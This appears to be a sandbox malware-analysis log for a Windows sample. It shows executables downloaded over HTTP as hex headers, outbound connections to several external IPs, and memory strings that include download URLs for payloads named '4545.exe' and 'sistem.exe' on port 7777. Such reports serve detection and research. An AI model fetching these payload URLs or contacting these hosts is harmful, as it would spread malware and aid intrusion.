                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 13:10:41 GMTContent-Type: application/x-msdos-programContent-Length: 3514792Connection: keep-aliveLast-Modified: Sun, 09 Jan 2022 11:37:55 GMTETag: "35a1a8-5d524a6ac8241"Accept-Ranges: bytesX-Robots-Tag: noindex, nofollow, nosnippet, noarchiveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 ed 8e da 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 1d 00 98 04 00 00 54 01 00 00 00 00 00 00 30 02 00 00 10 00 00 00 b0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 55 00 00 04 00 00 85 44 37 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c fc 50 00 20 01 00 00 00 c0 50 00 1d 2e 00 00 00 00 00 00 00 00 00 00 00 7e 35 00 a8 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 43 18 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 02 00 00 30 02 00 00 7a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 00 00 00 b0 04 00 00 72 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 a0 05 00 00 04 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 3e 27 18 00 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 d0 32 00 00 f0 1d 00 00 b4 2f 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 30 00 00 00 c0 50 00 00 24 00 00 00 a8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 32 77 31 34 30 54 54 00 c0 04 00 00 f0 50 00 00 b2 04 00 00 cc 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 61 64 61 74 61 00 00 00 10 00 00 00 b0 55 00 00 00 00 00 00 7e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 13:10:43 GMTContent-Type: application/x-msdos-programContent-Length: 2233856Connection: keep-aliveLast-Modified: Fri, 14 Jan 2022 12:21:45 GMTETag: "221600-5d589d8a97da5"Accept-Ranges: bytesX-Robots-Tag: noindex, nofollow, nosnippet, noarchiveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 06 00 00 16 00 00 00 fc 21 00 00 00 00 00 fa 22 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 22 00 00 04 00 00 7a af 22 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 27 22 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 40 22 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 22 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 14 00 00 00 10 00 00 00 16 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e f9 21 00 00 30 00 00 00 fa 21 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 ac 0f 00 00 00 30 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 70 64 61 74 61 00 00 90 00 00 00 00 40 22 00 00 02 00 00 00 14 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficTCP traffic: 192.168.2.4:49775 -> 95.143.179.185:31334
                  Source: global trafficTCP traffic: 192.168.2.4:49778 -> 45.82.70.152:7777
                  Source: global trafficTCP traffic: 192.168.2.4:49816 -> 157.90.156.89:6004
                  Source: AppLaunch.exe, 00000001.00000002.735161723.0000000007112000.00000004.00000001.sdmpString found in binary or memory: http://45.82.70.152:7777
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://45.82.70.152:7777/cabura-cash.pw/4545.exe
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735161723.0000000007112000.00000004.00000001.sdmpString found in binary or memory: http://45.82.70.152:7777/cabura-cash.pw/sistem.exe
                  Source: AppLaunch.exe, 00000001.00000002.735161723.0000000007112000.00000004.00000001.sdmpString found in binary or memory: http://45.82.70.152:77774
                  Source: AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmpString found in binary or memory: http://45.82.70.152:7777D8
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                  Source: conhost.exe, 00000015.00000000.751481626.00000224D5CB2000.00000004.00000020.sdmp, conhost.exe, 00000015.00000002.809219081.00000224D5CAB000.00000004.00000020.sdmpString found in binary or memory: http://go.mic4m
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                  Source: AppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmpString found in binary or memory: http://iptc.tc4xmp
                  Source: AppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmpString found in binary or memory: http://ns.ado/Identq
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
